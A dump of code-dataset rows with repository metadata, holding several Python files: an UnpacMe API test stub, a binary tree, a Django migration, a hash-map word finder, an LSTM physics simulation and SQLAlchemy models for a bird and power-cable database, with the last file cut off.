Dataset schema (column types and observed ranges):

| Column | Type | Observed range / values |
|---|---|---|
| blob_id | string | length 40 |
| directory_id | string | length 40 |
| path | string | length 3-281 |
| content_id | string | length 40 |
| detected_licenses | list | length 0-57 |
| license_type | string (categorical) | 2 values |
| repo_name | string | length 6-116 |
| snapshot_id | string | length 40 |
| revision_id | string | length 40 |
| branch_name | string (categorical) | 313 values |
| visit_date | timestamp[us] | |
| revision_date | timestamp[us] | |
| committer_date | timestamp[us] | |
| github_id | int64 | 18.2k-668M, nullable |
| star_events_count | int64 | 0-102k |
| fork_events_count | int64 | 0-38.2k |
| gha_license_id | string (categorical) | 17 values |
| gha_event_created_at | timestamp[us] | |
| gha_created_at | timestamp[us] | |
| gha_language | string (categorical) | 107 values |
| src_encoding | string (categorical) | 20 values |
| language | string (categorical) | 1 value |
| is_vendor | bool | 2 classes |
| is_generated | bool | 2 classes |
| length_bytes | int64 | 4-6.02M |
| extension | string (categorical) | 78 values |
| content | string | length 2-6.02M |
| authors | list | length 1-1 |
| author | string | length 0-175 |
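The schema above matches a Hugging Face code-corpus export, so the split can be read with the `datasets` library. The snippet below is a minimal loading sketch; the dataset id "org/this-dataset" is a placeholder assumption, not the actual repository path.

from datasets import load_dataset

# Placeholder id -- substitute the real dataset repository path.
ds = load_dataset("org/this-dataset", split="train", streaming=True)

for row in ds:
    # Field names follow the schema table above.
    print(row["repo_name"], row["path"], row["license_type"], row["length_bytes"])
    print(row["content"][:200])
    break

Streaming avoids materializing the whole split up front, which matters here because a single `content` field can reach roughly 6.02M characters.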
82499eb923a32ad19aeec1efd231f9c15b47ec86
|
62e7db04e60e07a6def7bc7e32e17d381ef0fa44
|
/test/test_unpack_status.py
|
712bddc93c308d9e45d7cfcafdaf90bb79d08937
|
[
"MIT",
"LicenseRef-scancode-warranty-disclaimer"
] |
permissive
|
kryptoslogic/unpacme-python
|
0e830cb44fb137bd076f4100da736b929c8cd30b
|
86529853f24ed00afa7e90b87fa64104dfc68dfe
|
refs/heads/master
| 2023-02-26T16:17:57.047693 | 2021-02-02T14:23:47 | 2021-02-02T14:23:47 | 335,313,234 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,386 |
py
|
"""
UnpacMe
# Introduction Welcome to the UNPACME API! All the malware unpacking and file analysis features that you are familiar with on the [unpac.me](https://www.unpac.me/) website are available through our API. You can easily integrate our unpacker into your malware analysis pipeline and begin unpacking at scale! # Authentication The public UNPACME API is publicly available and can be accessed without authentication. In order to use the private UNPACME API you must sign up for an account with UNPACME. Once you have a valid user account you can view your personal API key in your user profile. <SecurityDefinitions /> # Response Structure When interacting with the UNPACME API, if the request was correctly handled, a <b>200</b> HTTP status code will be returned. The body of the response will usually be a JSON object (except for file downloads). ## Response Status Codes Status Code | Description | Notes ------------- | ------------- | - 200 | OK | The request was successful 400 | Bad Request | The request was somehow incorrect. This can be caused by missing arguments or arguments with wrong values. 401 | Unauthorized | The supplied credentials, if any, are not sufficient to access the resource 403 | Forbidden | The account does not have enough privileges to make the request. 404 | Not Found | The requested resource is not found 429 | Too Many Requests | The request frequency has exceeded one of the account quotas (minute, daily or monthly). Monthly quotas are reset on the 1st of the month at 00:00 UTC. 500 | Server Error | The server could not return the representation due to an internal server error ## Error Response If an error has occurred while handling the request an error status code will be returned along with a JSON error message with the following properties. Property | Description ------------- | ------------- Error | The error type Description | A more informative message # Example Clients The following clients can be used to interact with the UNPACME API directly and are provided as examples. These clients are community projects and are not maintained or developed by UNPACME. UNPACME makes no claim as to the safety of these clients, use at your own risk. - [UnpacMe Python Client](https://github.com/larsborn/UnpacMeClient) (Python) - [UnpacMe GO Client](https://github.com/kryptoslogic/unpacme-go) (Golang) - [UnpacMe Library](https://github.com/R3MRUM/unpacme) (Python) - [AssemblyLine](https://github.com/CybercentreCanada/assemblyline-service-unpacme) (Automation Service) <br> # noqa: E501
The version of the OpenAPI document: 1.0.0
Generated by: https://openapi-generator.tech
"""
import sys
import unittest
import unpacme
from unpacme.model.status import Status
from unpacme.model.unpack_status_all_of import UnpackStatusAllOf
globals()['Status'] = Status
globals()['UnpackStatusAllOf'] = UnpackStatusAllOf
from unpacme.model.unpack_status import UnpackStatus
class TestUnpackStatus(unittest.TestCase):
"""UnpackStatus unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testUnpackStatus(self):
"""Test UnpackStatus"""
# FIXME: construct object with mandatory attributes with example values
# model = UnpackStatus() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
|
[
"[email protected]"
] | |
3d613b080afe7af474f8504d12bf40d8034710ab
|
52b5773617a1b972a905de4d692540d26ff74926
|
/.history/binaryTree2_20200615152326.py
|
64f23d35b04053fcbead026e6e8a6c7c2d94f816
|
[] |
no_license
|
MaryanneNjeri/pythonModules
|
56f54bf098ae58ea069bf33f11ae94fa8eedcabc
|
f4e56b1e4dda2349267af634a46f6b9df6686020
|
refs/heads/master
| 2022-12-16T02:59:19.896129 | 2020-09-11T12:05:22 | 2020-09-11T12:05:22 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 396 |
py
|
# Create a node and assign a value to the node
class Node:
def __init__(self,data):
# designate one node as root
self.data = data
# then the two others as child nodes
self.left = None
self.right = None
# A
def printTree(self):
print(self.data)
root = Node(10)
root.left = Node(2)
root.right = Node(3)
root.printTree()
|
[
"[email protected]"
] | |
50ac7fee9fba9158cdaa1d59c98b29131acafa31
|
234c0ce6a3c867b882f5aa6c8eb260f1a48c70ac
|
/mysite/blog/migrations/0003_auto_20190304_1654.py
|
542615bc94cb88de9e5182da038b20998688ab20
|
[] |
no_license
|
mubarakmaddy/MySite
|
b32e064f3d09a1d2898f6e0cb07f316ab1436079
|
5650a8c108e2cabf990a8e0cfd2e66b69d68d839
|
refs/heads/master
| 2020-04-23T21:46:11.204773 | 2019-06-27T09:02:22 | 2019-06-27T09:02:22 | 171,480,172 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,009 |
py
|
# Generated by Django 2.1.7 on 2019-03-04 11:24
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('blog', '0002_postmodel_author_email'),
]
operations = [
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=100)),
('content', models.TextField()),
('date_posted', models.DateTimeField(default=django.utils.timezone.now)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.DeleteModel(
name='PostModel',
),
]
|
[
"[email protected]"
] | |
4c8316dcfdb30ccba4b2ac6a9c266ca950e5db88
|
7ad63f456925594105573cdf3eebdf719b19a1e1
|
/python/code_challenges/hashmap-repeated-word/hashmap_repeated_word/hashmap_repeated_word.py
|
c3099cd4b8bf4706efd1eea98ff4b79ab93fcd6b
|
[] |
no_license
|
laithfayizhussein/data-structures-and-algorithm
|
18425437b238a9fe1060daec13d3c6aa378093d4
|
c0ef81bc7e0aa04627d0b2a08a2070fbb3b01b65
|
refs/heads/master
| 2023-08-03T15:29:52.697073 | 2021-09-14T14:47:10 | 2021-09-14T14:47:10 | 373,604,346 | 1 | 0 | null | 2021-09-14T14:47:12 | 2021-06-03T18:25:08 |
JavaScript
|
UTF-8
|
Python
| false | false | 2,196 |
py
|
import re
class Node:
def __init__(self, data):
self.data=data
self.next=None
class LinkedList:
def __init__(self):
self.head=None
def add(self, data):
node=Node(data)
if not self.head:
self.head=node
else:
current=self.head
while current.next:
current=current.next
current.next=node
def __str__(self):
values =[]
current = self.head
while current:
values.append(current.data)
current = current.next
return f'{values}'
class Hash_table:
def __init__(self, size):
self.size = size
self.map = [None]*size
def hash(self, key):
ascii = 0
for ch in key:
ascii_ch = ord(ch)
ascii += ascii_ch
temp_value = ascii * 19
hashed_key = temp_value % self.size
return hashed_key
def add(self,key,value):
hashed_key = self.hash(key)
if not self.map[hashed_key]:
self.map[hashed_key] = LinkedList()
self.map[hashed_key].add((key,value))
def contains(self,key):
hashed_key=self.hash(key)
if self.map[hashed_key]:
current=self.map[hashed_key].head
while current:
if current.data[0]==key:
return True
else:
current=current.next
return False
def get(self,key):
hashed_key = self.hash(key)
if self.map[hashed_key]:
current=self.map[hashed_key].head
while current:
if current.data[0]== key:
return current.data[1]
else:
current=current.next
return None
def repeated_word(book=None):
if book==None:
return 'book is empty'
hash_table=Hash_table(1024)
book = re.sub(r'\W+', ' ', book).lower().split()
for word in book:
if hash_table.contains(word):
return word
else:
hash_table.add(word, True)
|
[
"[email protected]"
] | |
4db3e4c30c7da93ef32b7bb65f05b44b0b744e49
|
416ad9ba952c563b9600c040d72d4bea8c6ac926
|
/src/lstm.py
|
380ce67a2254f609e2192219a0070e0440e8661c
|
[] |
no_license
|
bokutotu/Simulate
|
3d990d75666abec8e5c07a90d8d4720137f95c7d
|
a95826127df4ffdcbbf2ccbadea8262aa84ccdd5
|
refs/heads/main
| 2023-06-21T01:04:19.079336 | 2021-07-20T13:30:54 | 2021-07-20T13:30:54 | 387,800,087 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,441 |
py
|
import numpy as np
import torch
import leapfrog
import preprocess
class LSTMLeapFrog(leapfrog.LeapFrog):
def __init__(self, sim_len, atom_num, norm,
chainlen_c, floatlen_c, chainlen_v, floatlen_v,
coord, velocity, force,
net_n, net_ca, net_c, net_o,
feature_len, name, in_channels, in_channels_o):
super().__init__(sim_len, atom_num, norm,
coord, velocity, force,
net_n, net_ca, net_c, net_o)
self.feature_len = feature_len
self.name = name
self.device = "cuda:0" if torch.cuda.is_available() else "cpu"
self.in_channels = in_channels
self.in_channels_o = in_channels_o
self.chainlen_c = chainlen_c
self.floatlen_c = floatlen_c
self.chainlen_v = chainlen_v
self.floatlen_v = floatlen_v
def before_sim(self):
self.res_coord = np.zeros((self.feature_len+self.sim_len, self.atom_num, 3), dtype=np.float32)
self.res_velocity = np.zeros((self.feature_len+self.sim_len, self.atom_num, 3), dtype=np.float32)
self.res_force = np.zeros((self.feature_len+self.sim_len, self.atom_num, 3), dtype=np.float32)
self.res_coord[0:self.feature_len] = self.coord
self.res_velocity[0:self.feature_len] = self.velocity
self.res_force[0:self.feature_len] = self.force
self.features_ca = np.zeros(
(self.sim_len + self.feature_len, self.atom_num//4+1, self.in_channels),
dtype=np.float32)
self.features_c = np.zeros(
(self.sim_len + self.feature_len, self.atom_num//4+1, self.in_channels),
dtype=np.float32)
self.features_n = np.zeros(
(self.sim_len + self.feature_len, self.atom_num//4+1, self.in_channels),
dtype=np.float32)
self.features_o = np.zeros(
(self.sim_len + self.feature_len, self.atom_num//4, self.in_channels_o),
dtype=np.float32)
# Build the features for steps 0 to feature_len - 1 ahead of the first prediction
for time in range(self.feature_len-1):
f_n, f_ca, f_c, f_o, b_n, b_ca, b_c, b_o = \
preprocess.make_single(
chainlen_c=self.chainlen_c, floatlen_c=self.floatlen_c,
chainlen_v=self.chainlen_v, floatlen_v=self.floatlen_v,
atom_num=self.atom_num,
c=self.res_coord[time], v=self.res_velocity[time],
is_use_angles=True
)
self.features_n[time] = f_n
self.features_ca[time] = f_ca
self.features_c[time] = f_c
self.features_o[time] = f_o
def simulation_step(self, time):
# Compute and assign the features for time - 1
f_n, f_ca, f_c, f_o, b_n, b_ca, b_c, b_o = \
preprocess.make_single(
chainlen_c=self.chainlen_c, floatlen_c=self.floatlen_c,
chainlen_v=self.chainlen_v, floatlen_v=self.floatlen_v,
atom_num=self.atom_num,
c=self.res_coord[time+self.feature_len-1],
v=self.res_velocity[time+self.feature_len-1],
is_use_angles=True
)
self.features_n[time+self.feature_len-1] = f_n
self.features_ca[time+self.feature_len-1] = f_ca
self.features_c[time+self.feature_len-1] = f_c
self.features_o[time+self.feature_len-1] = f_o
# Slice out the features needed as input
input_tensor_ca = torch.tensor(self.features_ca[time:time+self.feature_len]) \
.to(self.device)
input_tensor_c = torch.tensor(self.features_c[time:time+self.feature_len]) \
.to(self.device)
input_tensor_n = torch.tensor(self.features_n[time:time+self.feature_len]) \
.to(self.device)
input_tensor_o = torch.tensor(self.features_o[time:time+self.feature_len]) \
.to(self.device)
# Reorder to the dimensions the neural network was trained with:
# (features_len, atom_num, in_channels) -> (atom_num, features_len, in_channels)
input_tensor_c = input_tensor_c.transpose(0,1)
input_tensor_ca = input_tensor_ca.transpose(0,1)
input_tensor_n = input_tensor_n.transpose(0,1)
input_tensor_o = input_tensor_o.transpose(0,1)
# Predict with the neural network
force_n, force_ca, force_c, force_o = \
self.pred_nn(input_tensor_n, input_tensor_ca, input_tensor_c, input_tensor_o)
# Use only the last predicted step
force_ca = force_ca[::, -1, ::]
force_c = force_c[::, -1, ::]
force_n = force_n[::, -1, ::]
force_o = force_o[::, -1, ::]
force = leapfrog.rotate_force(force_n,force_ca, force_c, force_o,
b_n, b_ca, b_c, b_o, self.atom_num, self.norm)
# Compute the velocities
v_now = leapfrog.cal_v_2(self.res_velocity[time+self.feature_len -1], self.mass, force)
self.res_velocity[time+self.feature_len] = v_now
# Compute the coordinates
c_now = leapfrog.cal_coord(self.res_coord[time + self.feature_len - 1], v_now)
self.res_coord[time + self.feature_len] = c_now
def save(self):
np.save(self.name, self.res_coord[self.feature_len:-1:])
|
[
"[email protected]"
] | |
b8c56deb337421b8e05a8a70c59c71923d4bf996
|
9039db1d63664122ac65176b1159d61eccc1ec61
|
/cables/models/__init__.py
|
1b560f4780f9466098aae59bf3a22d20f298f283
|
[] |
no_license
|
yjacolin/Avifaune-Cables_aeriens
|
8e28594c0a9b58084f3371e77ec49ed11d879a78
|
273b95be496d1b37163a40c4e2a92b60b733b903
|
refs/heads/master
| 2020-03-22T07:41:44.926554 | 2018-07-04T11:58:37 | 2018-07-04T11:58:37 | 139,718,598 | 0 | 0 | null | 2018-07-04T12:22:56 | 2018-07-04T12:22:55 | null |
UTF-8
|
Python
| false | false | 28,487 |
py
|
#-*- coding: utf-8 -*-
import logging
import sqlahelper
from sqlalchemy import BigInteger, Boolean, CheckConstraint, Column, Date, DateTime, Float, ForeignKey, Index, Integer, String, Table, Text, text, Unicode
from sqlalchemy.sql.sqltypes import NullType
from sqlalchemy.orm import relationship, mapper
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.ext.associationproxy import association_proxy
log = logging.getLogger(__name__)
Base = sqlahelper.get_base()
metadata = Base.metadata
DBSession = sqlahelper.get_session()
def outer_join_accessor_factory(collection_type, proxy):
def getter(obj):
if obj is None:
return None
return getattr(obj, proxy.value_attr)
def setter(obj, value):
setattr(obj, proxy.value_attr, value)
return getter, setter
class DicoAge(Base):
__tablename__ = 'dico_age'
id_age = Column(Integer, primary_key=True)
lib_age = Column(String(20))
class DicoCauseMortalite(Base):
__tablename__ = 'dico_cause_mortalite'
id_cause_mortalite = Column(Integer, primary_key=True)
lib_cause_mortalite = Column(String(20))
class DicoClassesRisque(Base):
__tablename__ = 'dico_classes_risque'
id_classe_risque = Column(Integer, primary_key=True, server_default=text("nextval('dico_classes_risque_id_classe_risque_seq'::regclass)"))
lib_classe_risque = Column(String(30))
class DicoNbEquipement(Base):
__tablename__ = 'dico_nb_equipements'
id_nb_equipements = Column(Integer, primary_key=True)
nb_equipements = Column(Integer)
class DicoSexe(Base):
__tablename__ = 'dico_sexe'
id_sexe = Column(Integer, primary_key=True)
lib_sexe = Column(String(20))
class DicoSource(Base):
__tablename__ = 'dico_source'
id_source = Column(Integer, primary_key=True)
lib_source = Column(String(20))
class DicoTypeEquipementPoteau(Base):
__tablename__ = 'dico_type_equipement_poteau'
id_type_equipement_poteau = Column(Integer, primary_key=True)
nom_type_equipement_poteau = Column(String)
class DicoTypeEquipementTroncon(Base):
__tablename__ = 'dico_type_equipement_troncon'
id_type_equipement_troncon = Column(Integer, primary_key=True)
nom_type_equipement_troncon = Column(String)
class DicoTypePoteauErdf(Base):
__tablename__ = 'dico_type_poteau_erdf'
id_type_poteau_erdf = Column(Integer, primary_key=True)
lib_type_poteau_erdf = Column(String)
class ErdfAppareilCoupure(Base):
__tablename__ = 'erdf_appareil_coupure'
__table_args__ = (
CheckConstraint(u"(public.geometrytype(geom) = 'POINT'::text) OR (geom IS NULL)"),
CheckConstraint(u'public.st_ndims(geom) = 2'),
CheckConstraint(u'public.st_srid(geom) = 4326')
)
id = Column(Integer, primary_key=True, server_default=text("nextval('erdf_appareil_coupure_id_seq'::regclass)"))
AUTOMATISM = Column(String(62))
AUTOMATIS1 = Column(String(62))
AUTOMATIS2 = Column(String(62))
POTEAU_HTA = Column(String(32))
STATUT = Column(String(12))
TYPE_DE_CO = Column(String(32))
T_L_COMMAN = Column(String(7))
SYMBOLOGIE = Column(String(64))
ANGLE = Column(Float(53))
SYSANGLE = Column(Float(53))
geom = Column(NullType, index=True)
geom_json = Column(String)
class ErdfConnexionAerienne(Base):
__tablename__ = 'erdf_connexion_aerienne'
__table_args__ = (
CheckConstraint(u"(public.geometrytype(geom) = 'POINT'::text) OR (geom IS NULL)"),
CheckConstraint(u'public.st_ndims(geom) = 2'),
CheckConstraint(u'public.st_srid(geom) = 4326')
)
id = Column(Integer, primary_key=True, server_default=text("nextval('erdf_connexion_aerienne_id_seq'::regclass)"))
POTEAU_HTA = Column(String(32))
STATUT = Column(String(12))
TYPE_DE_CO = Column(String(40))
SYMBOLOGIE = Column(String(64))
ANGLE = Column(Float(53))
SYSANGLE = Column(Float(53))
ID_SIG = Column(Integer)
geom = Column(NullType, index=True)
geom_json = Column(String)
class ErdfParafoudre(Base):
__tablename__ = 'erdf_parafoudre'
__table_args__ = (
CheckConstraint(u"(public.geometrytype(geom) = 'POINT'::text) OR (geom IS NULL)"),
CheckConstraint(u'public.st_ndims(geom) = 2'),
CheckConstraint(u'public.st_srid(geom) = 4326')
)
id = Column(Integer, primary_key=True, server_default=text("nextval('erdf_parafoudre_id_seq'::regclass)"))
POTEAU_HTA = Column(String(32))
STATUT = Column(String(12))
TYPE = Column(String(32))
SYMBOLOGIE = Column(String(64))
ANGLE = Column(Float(53))
SYSANGLE = Column(Float(53))
ID_SIG = Column(Integer)
geom = Column(NullType, index=True)
geom_json = Column(String)
class ErdfPosteElectrique(Base):
__tablename__ = 'erdf_poste_electrique'
__table_args__ = (
CheckConstraint(u"(public.geometrytype(geom) = 'POINT'::text) OR (geom IS NULL)"),
CheckConstraint(u'public.st_ndims(geom) = 2'),
CheckConstraint(u'public.st_srid(geom) = 4326')
)
id = Column(Integer, primary_key=True, server_default=text("nextval('erdf_poste_electrique_id_seq'::regclass)"))
FONCTION_P = Column(String(40))
NOM_DU_POS = Column(String(32))
POTEAU_HTA = Column(String(32))
STATUT = Column(String(12))
TYPE_DE_PO = Column(String(51))
SYMBOLOGIE = Column(String(64))
ANGLE = Column(Float(53))
SYSANGLE = Column(Float(53))
ID_SIG = Column(Integer)
geom = Column(NullType, index=True)
geom_json = Column(String)
class ErdfRemonteeAerosout(Base):
__tablename__ = 'erdf_remontee_aerosout'
__table_args__ = (
CheckConstraint(u"(public.geometrytype(geom) = 'POINT'::text) OR (geom IS NULL)"),
CheckConstraint(u'public.st_ndims(geom) = 2'),
CheckConstraint(u'public.st_srid(geom) = 4326')
)
id = Column(Integer, primary_key=True, server_default=text("nextval('erdf_remontee_aerosout_id_seq'::regclass)"))
APPAREIL_D = Column(String(32))
CONNEXION_ = Column(String(32))
HAUTEUR_PO = Column(Float(53))
INDICATEUR = Column(String(32))
PARAFOUDRE = Column(String(32))
PROTECTION = Column(String(7))
REMONT_E_A = Column(String(7))
STATUT = Column(String(12))
SYMBOLOGIE = Column(String(64))
ANGLE = Column(Float(53))
SYSANGLE = Column(Float(53))
ID_SIG = Column(Integer)
geom = Column(NullType, index=True)
geom_json = Column(String)
class ErdfTronconAerien(Base):
__tablename__ = 'erdf_troncon_aerien'
__table_args__ = (
CheckConstraint(u"(public.geometrytype(geom) = 'LINESTRING'::text) OR (geom IS NULL)"),
CheckConstraint(u'public.st_ndims(geom) = 2'),
CheckConstraint(u'public.st_srid(geom) = 4326')
)
STATUT = Column(String(12))
TECHNOLOGI = Column(String(32))
TECHNOLOG1 = Column(String(32))
SYMBOLOGIE = Column(String(64))
COMMENTAIR = Column(String(30))
geom = Column(NullType, index=True)
ID_SIG = Column(Integer)
id = Column(Integer, primary_key=True, server_default=text("nextval('erdf_troncon_aerien_id_seq'::regclass)"))
geom_json = Column(String)
class OgmCablesRemonteesMecanique(Base):
__tablename__ = 'ogm_cables_remontees_mecaniques'
__table_args__ = (
CheckConstraint(u'public.st_ndims(geom) = 2'),
CheckConstraint(u'public.st_srid(geom) = 4326')
)
geom = Column(NullType, index=True)
OBJECTID = Column(Integer)
idcable = Column(Integer, primary_key=True)
TypeInfra = Column(String(50))
NomInfra = Column(String(50))
IdDomaine = Column(Integer)
DateMontag = Column(DateTime)
DateDemont = Column(DateTime)
DateModif = Column(DateTime)
SHAPE_Leng = Column(Float(53))
geom_json = Column(String)
class OgmDomainesSkiable(Base):
__tablename__ = 'ogm_domaines_skiables'
__table_args__ = (
CheckConstraint(u'public.st_ndims(geom) = 2'),
CheckConstraint(u'public.st_srid(geom) = 4326')
)
geom = Column(NullType, index=True)
OBJECTID = Column(Integer)
iddomaine = Column(Integer, primary_key=True)
NomRDomain = Column(String(255))
IdExploita = Column(Integer)
Activite = Column(String(255))
MoOGM = Column(String(255))
Dpt = Column(String(100))
NomStation = Column(String(255))
SHAPE_Leng = Column(Float(53))
SHAPE_Area = Column(Float(53))
MoOGM_Vis = Column(String(255))
Annee_Plan = Column(Integer)
Surface_DS = Column(Integer)
geom_json = Column(String)
class OgmTronconsDangereux(Base):
__tablename__ = 'ogm_troncons_dangereux'
__table_args__ = (
CheckConstraint(u"(public.geometrytype(geom) = 'LINESTRING'::text) OR (geom IS NULL)"),
CheckConstraint(u'public.st_ndims(geom) = 2'),
CheckConstraint(u'public.st_srid(geom) = 4326')
)
geom = Column(NullType, index=True)
OBJECTID = Column(Integer)
idtd = Column(Integer, primary_key=True)
IdCable = Column(Integer)
Espece = Column(String(100))
Nombre = Column(Integer)
Estimation = Column(String(100))
Sexe = Column(String(20))
Age = Column(String(20))
idPyBas = Column(String(100))
idPyHt = Column(String(100))
NomObs = Column(String(100))
LongReelle = Column(Integer)
Date_ = Column(DateTime)
SHAPE_Leng = Column(Float(53))
geom_json = Column(String)
class OgmTronconsVisualise(Base):
__tablename__ = 'ogm_troncons_visualises'
__table_args__ = (
CheckConstraint(u'public.st_ndims(geom) = 2'),
CheckConstraint(u'public.st_srid(geom) = 4326')
)
geom = Column(NullType, index=True)
OBJECTID = Column(Integer)
idtv = Column(Integer, primary_key=True)
IdCable = Column(Integer)
TypeVisu = Column(String(255))
Financeur = Column(String(255))
Operateur = Column(String(255))
IdPyBas = Column(String(100))
IdPyHt = Column(String(100))
LongReelle = Column(Integer)
Date_visu = Column(DateTime)
SHAPE_Leng = Column(Float(53))
geom_json = Column(String)
class OgmTronconsVisualisesDangereux(Base):
__tablename__ = 'ogm_troncons_visualises_dangereux'
__table_args__ = (
CheckConstraint(u"(public.geometrytype(geom) = 'LINESTRING'::text) OR (geom IS NULL)"),
CheckConstraint(u'public.st_ndims(geom) = 2'),
CheckConstraint(u'public.st_srid(geom) = 4326')
)
geom = Column(NullType, index=True)
OBJECTID = Column(Integer)
Espece = Column(String(100))
Nombre = Column(Integer)
Estimation = Column(String(100))
Sexe = Column(String(20))
Age = Column(String(20))
idPyBas = Column(String(100))
idPyHt = Column(String(100))
NomObs = Column(String(100))
LongReelle = Column(Integer)
Date_ = Column(DateTime)
idtvd = Column(Integer, primary_key=True)
IdTV = Column(Integer)
Shape_Leng = Column(Float(53))
raisons = Column(String(255))
geom_json = Column(String)
class RteLigne(Base):
__tablename__ = 'rte_lignes'
__table_args__ = (
CheckConstraint(u"(public.geometrytype(geom) = 'LINESTRING'::text) OR (geom IS NULL)"),
CheckConstraint(u'public.st_ndims(geom) = 2'),
CheckConstraint(u'public.st_srid(geom) = 4326')
)
id_rte_ligne = Column(Integer, primary_key=True, server_default=text("nextval('rte_lignes_id_rte_ligne_seq'::regclass)"))
U_MAX = Column(String(20))
CONFIG = Column(String)
TERNE_EX = Column(Integer)
ADR_LIT_1 = Column(String)
ADR_LIT_2 = Column(String)
ADR_LIT_3 = Column(String)
geom = Column(NullType, index=True)
geom_json = Column(String)
class RtePoste(Base):
__tablename__ = 'rte_postes'
__table_args__ = (
CheckConstraint(u"(public.geometrytype(geom) = 'POINT'::text) OR (geom IS NULL)"),
CheckConstraint(u'public.st_ndims(geom) = 2'),
CheckConstraint(u'public.st_srid(geom) = 4326')
)
id_rte_poste = Column(Integer, primary_key=True, server_default=text("nextval('rte_postes_id_rte_poste_seq'::regclass)"))
U_MAX = Column(String(20))
LIBELLE = Column(String(64))
LIB_SUIT = Column(String(64))
geom = Column(NullType, index=True)
geom_json = Column(String)
class RtePoteaux(Base):
__tablename__ = 'rte_poteaux'
__table_args__ = (
CheckConstraint(u"(public.geometrytype(geom) = 'POINT'::text) OR (geom IS NULL)"),
CheckConstraint(u'public.st_ndims(geom) = 2'),
CheckConstraint(u'public.st_srid(geom) = 4326')
)
id_rte_poteaux = Column(Integer, primary_key=True, server_default=text("nextval('rte_poteaux_id_rte_poteaux_seq'::regclass)"))
U_MAX = Column(String(20))
NB_TERNE = Column(Integer)
geom = Column(NullType, index=True)
geom_json = Column(String)
class TAxesMigratoire(Base):
__tablename__ = 't_axes_migratoires'
__table_args__ = (
CheckConstraint(u"((public.geometrytype(geom) = 'POLYGON'::text) OR (public.geometrytype(geom) = 'MULTIPOLYGON'::text)) OR (geom IS NULL)"),
CheckConstraint(u'public.st_ndims(geom) = 2'),
CheckConstraint(u'public.st_srid(geom) = 4326')
)
id_axe_migratoire = Column(Integer, primary_key=True, server_default=text("nextval('t_axes_migratoires_id_axe_migratoire_seq'::regclass)"))
nom_axe_migratoire = Column(String(100))
migration = Column(Integer)
source = Column(String(100))
description = Column(String)
geom = Column(NullType, nullable=False, index=True)
geom_json = Column(String)
class TCasMortalite(Base):
__tablename__ = 't_cas_mortalite'
__table_args__ = (
CheckConstraint(u"(public.geometrytype(geom) = 'POINT'::text) OR (geom IS NULL)"),
CheckConstraint(u'public.st_ndims(geom) = 2'),
CheckConstraint(u'public.st_srid(geom) = 4326')
)
id_cas_mortalite = Column(Integer, primary_key=True, server_default=text("nextval('t_cas_mortalite_id_cas_mortalite_seq'::regclass)"))
id_espece = Column(ForeignKey(u't_especes.id_espece'), nullable=False)
source = Column(String(100))
id_cause_mortalite = Column(ForeignKey(u'dico_cause_mortalite.id_cause_mortalite'), nullable=False)
nb_cas = Column(Integer)
sexe = Column(String(30))
age = Column(String(30))
date = Column(Date)
geom = Column(NullType, index=True)
geom_json = Column(String)
dico_cause_mortalite = relationship(u'DicoCauseMortalite')
t_espece = relationship(u'TEspece')
class TCommune(Base):
__tablename__ = 't_communes'
__table_args__ = (
CheckConstraint(u'public.st_ndims(geom) = 2'),
CheckConstraint(u'public.st_srid(geom) = 4326')
)
insee = Column(Integer, primary_key=True)
nom_commune = Column(Unicode(100))
geom = Column(NullType, nullable=False, index=True)
geom_json = Column(String)
equipements = association_proxy('poteaux', 'equipements', getset_factory=outer_join_accessor_factory)
eq_troncons = association_proxy('troncons', 'equipements', getset_factory=outer_join_accessor_factory)
class TEquipementsPoteauxErdf(Base):
__tablename__ = 't_equipements_poteaux_erdf'
id_equipement_poteau_erdf = Column(Integer, primary_key=True, server_default=text("nextval('t_equipements_poteaux_erdf_id_equipement_poteau_erdf_seq'::regclass)"))
id_inventaire_poteau_erdf = Column(ForeignKey(u't_inventaire_poteaux_erdf.id_inventaire_poteau_erdf', ondelete=u'CASCADE', onupdate=u'CASCADE'))
id_type_equipement_poteau = Column(ForeignKey(u'dico_type_equipement_poteau.id_type_equipement_poteau'))
date_equipement = Column(Date)
login_saisie = Column(String(25))
mis_en_place = Column(Boolean, server_default=text("false"))
id_nb_equipements = Column(ForeignKey(u'dico_nb_equipements.id_nb_equipements'))
t_inventaire_poteaux_erdf = relationship(u'TInventairePoteauxErdf', backref="equipements")
dico_nb_equipement = relationship(u'DicoNbEquipement')
dico_type_equipement_poteau = relationship(u'DicoTypeEquipementPoteau')
class TEquipementsTronconsErdf(Base):
__tablename__ = 't_equipements_troncons_erdf'
__table_args__ = (
CheckConstraint(u"(public.geometrytype(geom) = 'LINESTRING'::text) OR (geom IS NULL)"),
CheckConstraint(u'public.st_ndims(geom) = 2'),
CheckConstraint(u'public.st_srid(geom) = 4326')
)
id_equipement_troncon_erdf = Column(Integer, primary_key=True, server_default=text("nextval('t_equipements_troncons_erdf_id_equipement_troncon_erdf_seq'::regclass)"))
id_inventaire_troncon_erdf = Column(ForeignKey(u't_inventaire_troncons_erdf.id_inventaire_troncon_erdf', ondelete=u'CASCADE', onupdate=u'CASCADE'))
id_type_equipement_troncon = Column(ForeignKey(u'dico_type_equipement_troncon.id_type_equipement_troncon'))
date_equipement_troncon = Column(Date)
geom = Column(NullType, index=True)
login_saisie = Column(String(25))
geom_json = Column(String)
t_inventaire_troncons_erdf = relationship(u'TInventaireTronconsErdf', backref="equipements")
dico_type_equipement_troncon = relationship(u'DicoTypeEquipementTroncon')
class TEspece(Base):
__tablename__ = 't_especes'
id_espece = Column(Integer, primary_key=True, server_default=text("nextval('t_especes_id_espece_seq'::regclass)"))
nom_espece = Column(String(100), nullable=False)
taille_zone_tampon = Column(Integer)
code_couleur = Column(String(20))
t_v_zones_sensibles = Table(
'v_zones_sensibles', metadata,
Column('id_zone_sensible', Integer, primary_key=True),
